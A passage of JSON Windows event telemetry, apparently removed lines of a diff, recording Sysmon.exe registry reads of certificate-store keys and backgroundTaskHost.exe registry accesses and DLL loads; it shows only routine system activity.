"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog\\ContentDeliveryManager.Background.WatchdogTask", - "registry_value": "ContentDeliveryManager.Background.WatchdogTask", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wincorlib.dll", - "image_path": "C:\\Windows\\System32\\wincorlib.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sppc.dll", - "image_path": "C:\\Windows\\System32\\sppc.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 